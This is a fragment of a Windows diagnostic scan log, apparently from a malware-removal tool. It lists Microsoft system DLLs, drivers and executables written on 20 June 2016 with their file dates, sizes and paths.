2016-06-20 13:24 - 2015-01-06 02:12 - 00185856 _____ (Microsoft Corporation) C:\Windows\system32\rascfg.dll
2016-06-20 13:24 - 2015-01-06 02:02 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rascfg.dll
2016-06-20 13:19 - 2015-12-30 22:53 - 02017624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-06-20 13:19 - 2015-09-29 13:24 - 00155480 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2016-06-20 13:19 - 2015-04-30 00:22 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-06-20 13:19 - 2015-03-09 03:02 - 00057856 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthhfenum.sys
2016-06-20 13:19 - 2015-01-27 04:44 - 00933888 _____ (Microsoft Corporation) C:\Windows\system32\calc.exe
2016-06-20 13:19 - 2015-01-24 02:51 - 00816128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\calc.exe
2016-06-20 13:18 - 2016-02-02 19:16 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-06-20 13:18 - 2016-01-09 02:38 - 00091992 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-06-20 13:18 - 2015-12-16 18:11 - 01200128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Globalization.dll
2016-06-20 13:18 - 2015-12-16 17:51 - 00868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Globalization.dll
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZST.DLL
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZST.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2016-06-20 13:18 - 2015-10-22 17:21 - 00323072 _____ (Microsoft Corporation) C:\Windows\system32\GlobCollationHost.dll
2016-06-20 13:18 - 2015-10-22 16:58 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GlobCollationHost.dll
2016-06-20 13:18 - 2015-10-22 15:08 - 00513456 _____ C:\Windows\SysWOW64\locale.nls
2016-06-20 13:18 - 2015-10-22 15:08 - 00513456 _____ C:\Windows\system32\locale.nls
2016-06-20 13:18 - 2015-05-07 17:47 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2016-06-20 13:18 - 2015-05-07 16:21 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\GeofenceMonitorService.dll
2016-06-20 13:18 - 2015-05-07 16:05 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GeofenceMonitorService.dll
2016-06-20 13:18 - 2015-04-10 01:34 - 02256896 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-06-20 13:18 - 2015-04-10 01:11 - 01943040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-06-20 13:18 - 2015-03-11 02:49 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2016-06-20 13:18 - 2015-03-11 02:09 - 00021504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2016-06-20 13:18 - 2014-12-19 09:57 - 00788680 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-06-20 13:18 - 2014-12-19 09:25 - 00602776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-06-20 13:17 - 2016-01-24 19:19 - 00419160 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2016-06-20 13:17 - 2016-01-24 19:19 - 00331608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2016-06-20 13:17 - 2016-01-24 12:57 - 01335296 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
2016-06-20 13:17 - 2016-01-24 12:45 - 01063424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
2016-06-20 13:17 - 2015-09-04 20:24 - 00154112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tunnel.sys
2016-06-20 13:17 - 2015-08-06 17:47 - 04710400 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2016-06-20 13:17 - 2015-08-06 17:18 - 04068352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2016-06-20 13:16 - 2016-01-21 20:35 - 00952928 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-06-20 13:16 - 2016-01-21 19:42 - 00786152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-06-20 13:15 - 2016-06-03 18:11 - 00472576 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-06-20 13:15 - 2016-06-03 14:38 - 01413120 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-06-20 13:15 - 2016-06-02 18:51 - 00050352 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-06-20 13:15 - 2016-05-29 16:04 - 01204224 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00569856 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00544256 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-06-20 13:15 - 2016-03-28 14:21 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-06-20 13:15 - 2016-02-05 15:46 - 01455104 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2016-06-20 13:15 - 2015-09-03 03:18 - 02531400 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-06-20 13:15 - 2015-09-03 03:17 - 01903848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-06-20 13:15 - 2015-08-28 23:20 - 00183368 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-06-20 13:15 - 2015-07-22 15:19 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-06-20 13:15 - 2015-07-22 14:52 - 01633792 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-06-20 13:15 - 2015-07-17 15:15 - 00951296 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2016-06-20 13:15 - 2015-07-17 15:10 - 00749568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2016-06-20 13:15 - 2015-03-20 02:56 - 00080384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ahcache.sys
2016-06-20 13:15 - 2015-01-29 02:58 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\photowiz.dll
2016-06-20 13:15 - 2015-01-29 02:29 - 00290816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\photowiz.dll
2016-06-20 13:14 - 2015-03-04 02:32 - 00172544 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2016-06-20 13:14 - 2015-03-04 02:12 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2016-06-20 13:14 - 2015-03-02 02:43 - 00222208 _____ (Microsoft Corporation) C:\Windows\system32\rastapi.dll
2016-06-20 13:14 - 2015-03-02 02:21 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastapi.dll
2016-06-20 13:13 - 2016-06-20 13:13 - 00000000 ____D C:\Users\User not found\AppData\Roaming\MPC-HC
2016-06-20 13:13 - 2016-02-03 16:14 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\IPMIDrv.sys
2016-06-20 13:13 - 2016-02-02 18:51 - 00162304 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-06-20 13:13 - 2016-02-02 18:19 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-06-20 13:13 - 2016-02-02 18:01 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\WsmAgent.dll
2016-06-20 13:13 - 2016-02-02 17:51 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-06-20 13:13 - 2016-02-02 17:48 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-06-20 13:13 - 2016-02-02 17:46 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAgent.dll
2016-06-20 13:13 - 2016-02-02 17:41 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-06-20 13:13 - 2016-02-02 17:39 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-06-20 13:13 - 2016-01-09 02:49 - 00218448 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2016-06-20 13:13 - 2016-01-09 02:49 - 00192120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2016-06-20 13:13 - 2015-04-01 23:22 - 02985984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2016-06-20 13:13 - 2015-04-01 23:20 - 04417536 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2016-06-20 13:13 - 2015-04-01 04:45 - 01491456 _____ (Microsoft Corporation) C:\Windows\system32\dbghelp.dll
2016-06-20 13:13 - 2015-04-01 03:31 - 01207296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll
2016-06-20 13:12 - 2016-04-12 16:46 - 14467584 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-06-20 13:12 - 2016-04-12 16:30 - 12879872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-06-20 13:12 - 2016-04-10 06:35 - 00551256 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2016-06-20 13:12 - 2016-04-09 23:15 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-06-20 13:12 - 2016-04-09 23:14 - 00306176 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Geolocation.dll
2016-06-20 13:12 - 2016-04-09 23:10 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2016-06-20 13:12 - 2016-04-09 23:09 - 00754176 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-06-20 13:12 - 2016-04-09 23:02 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\LocationApi.dll
2016-06-20 13:12 - 2016-04-09 22:59 - 00218112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Geolocation.dll
2016-06-20 13:12 - 2016-04-09 22:59 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-06-20 13:12 - 2016-04-09 22:56 - 00543232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-06-20 13:12 - 2016-04-09 22:55 - 00881152 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-06-20 13:12 - 2016-04-09 22:52 - 00281088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LocationApi.dll
2016-06-20 13:12 - 2016-04-07 17:34 - 00987136 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-06-20 13:12 - 2016-04-07 17:06 - 00927744 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2016-06-20 13:12 - 2016-04-07 16:36 - 00800768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-06-20 13:12 - 2016-04-06 22:21 - 00114528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mup.sys
2016-06-20 13:12 - 2016-04-06 19:20 - 00559104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
2016-06-20 13:12 - 2016-04-06 19:20 - 00402432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2016-06-20 13:12 - 2016-04-06 19:17 - 18825216 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-06-20 13:12 - 2016-04-06 17:25 - 15158272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-06-20 13:12 - 2016-04-05 23:37 - 00205824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndiswan.sys
2016-06-20 13:12 - 2016-04-02 15:09 - 00130560 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfg.exe
2016-06-20 13:12 - 2016-04-02 14:58 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfgLib.dll
2016-06-20 13:12 - 2016-04-01 18:40 - 00322048 _____ (Microsoft Corporation) C:\Windows\system32\fvecpl.dll
2016-06-20 13:12 - 2016-04-01 18:00 - 00840704 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-06-20 13:12 - 2016-04-01 17:53 - 00348672 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2016-06-20 13:12 - 2016-04-01 17:50 - 00737280 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-06-20 13:12 - 2016-04-01 17:41 - 00696832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-06-20 13:12 - 2016-03-31 07:53 - 07446360 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-06-20 13:12 - 2016-03-31 07:51 - 01134776 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-06-20 13:12 - 2016-03-31 05:36 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 22365472 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 19794896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 02757616 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-06-20 13:12 - 2016-02-09 02:31 - 02412576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-06-20 13:12 - 2016-02-09 02:31 - 00273264 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
2016-06-20 13:12 - 2016-02-08 21:55 - 02712576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-06-20 13:12 - 2016-02-08 21:15 - 02551808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll
2016-06-20 13:12 - 2016-02-08 21:02 - 01197056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll
2016-06-20 13:12 - 2016-02-08 20:43 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
2016-06-20 13:12 - 2016-02-08 20:40 - 00539648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hgcpl.dll
2016-06-20 13:12 - 2016-02-08 20:39 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\stobject.dll
2016-06-20 13:12 - 2016-02-08 20:37 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingMonitor.dll
2016-06-20 13:12 - 2016-02-08 20:35 - 00954880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
2016-06-20 13:12 - 2016-02-08 20:34 - 00667648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-06-20 13:12 - 2016-02-08 20:33 - 00520192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-06-20 13:12 - 2016-02-08 19:50 - 03120640 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-06-20 13:12 - 2016-02-08 18:55 - 02592256 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll
2016-06-20 13:12 - 2016-02-08 18:33 - 01278464 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2016-06-20 13:12 - 2016-02-08 18:02 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
2016-06-20 13:12 - 2016-02-08 18:00 - 00599552 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll
2016-06-20 13:12 - 2016-02-08 17:58 - 00336384 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
2016-06-20 13:12 - 2016-02-08 17:55 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\SettingMonitor.dll
2016-06-20 13:12 - 2016-02-08 17:53 - 02171904 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlowUI.dll
2016-06-20 13:12 - 2016-02-08 17:53 - 01348096 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-06-20 13:12 - 2016-02-08 17:50 - 01220096 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
2016-06-20 13:12 - 2016-02-08 17:50 - 00841728 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-06-20 13:12 - 2016-02-08 17:48 - 00655872 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-06-20 13:12 - 2016-02-08 17:47 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
2016-06-20 13:12 - 2016-02-08 17:44 - 00955392 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-06-20 13:12 - 2016-02-04 17:57 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\httpprxp.dll
2016-06-20 13:12 - 2016-02-04 17:49 - 00125440 _____ (Microsoft Corporation) C:\Windows\system32\httpprxm.dll
2016-06-20 13:12 - 2016-02-04 17:39 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\adhsvc.dll
2016-06-20 13:12 - 2015-03-13 02:11 - 02162176 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-06-20 13:12 - 2015-03-13 01:39 - 01812992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-06-20 13:09 - 2016-03-08 15:44 - 00138240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-06-20 13:09 - 2016-02-03 16:11 - 01673728 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2016-06-20 13:09 - 2016-02-02 18:15 - 00787456 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2016-06-20 13:09 - 2016-01-07 00:46 - 00148752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscapi.dll
2016-06-20 13:09 - 2016-01-07 00:45 - 00177712 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2016-06-20 13:09 - 2016-01-06 17:47 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2016-06-20 13:09 - 2015-04-08 23:41 - 00158720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rgb9rast.dll
2016-06-20 13:09 - 2015-04-03 01:35 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\PhotoMetadataHandler.dll
2016-06-20 13:09 - 2015-04-03 01:14 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoMetadataHandler.dll
2016-06-20 13:09 - 2015-03-13 03:02 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys
2016-06-20 13:08 - 2016-03-10 18:43 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-06-20 13:08 - 2016-03-10 17:55 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-06-20 13:08 - 2016-03-10 17:42 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-06-20 13:08 - 2016-01-26 20:15 - 00072024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpci.sys
2016-06-20 13:08 - 2016-01-26 15:48 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys
2016-06-20 13:08 - 2016-01-20 23:40 - 00099672 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2016-06-20 13:08 - 2015-10-03 20:41 - 01385280 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-06-20 13:08 - 2015-10-03 20:41 - 01124384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-06-20 13:07 - 2016-03-10 18:03 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\dsparse.dll
2016-06-20 13:07 - 2016-03-10 17:48 - 00024064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dsparse.dll
2016-06-20 13:07 - 2016-01-22 06:22 - 02487296 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
2016-06-20 13:07 - 2016-01-22 06:11 - 01482240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
2016-06-20 13:07 - 2015-08-06 18:05 - 00669184 _____ (Microsoft Corporation) C:\Windows\system32\hhctrl.ocx
2016-06-20 13:07 - 2015-08-06 17:37 - 00536576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hhctrl.ocx
2016-06-20 13:07 - 2015-04-25 03:25 - 00020992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023.sys
2016-06-20 13:07 - 2015-02-03 01:03 - 03551744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2016-06-20 13:07 - 2015-02-03 01:02 - 04298240 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2016-06-20 13:07 - 2015-01-30 03:03 - 01488896 _____ (Microsoft Corporation) C:\Windows\system32\mfc42u.dll
2016-06-20 13:07 - 2015-01-30 03:03 - 01464832 _____ (Microsoft Corporation) C:\Windows\system32\mfc42.dll
2016-06-20 13:07 - 2015-01-30 02:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42u.dll
2016-06-20 13:07 - 2015-01-30 02:42 - 01204224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42.dll
2016-06-20 13:06 - 2016-03-05 18:44 - 00148480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shacct.dll
2016-06-20 13:06 - 2016-03-05 18:04 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\shacct.dll
2016-06-20 13:06 - 2016-02-04 19:07 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\dhcpsapi.dll
2016-06-20 13:06 - 2016-02-04 18:35 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpsapi.dll
2016-06-20 13:06 - 2016-02-02 18:18 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
2016-06-20 13:06 - 2016-01-10 17:41 - 01707008 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2016-06-20 13:06 - 2016-01-10 17:31 - 01344512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2016-06-20 13:06 - 2015-12-30 21:49 - 00470360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-06-20 13:06 - 2015-11-19 15:33 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2016-06-20 13:06 - 2015-11-19 15:26 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2016-06-20 13:06 - 2015-05-03 16:09 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-06-20 13:06 - 2015-05-03 15:58 - 00210944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
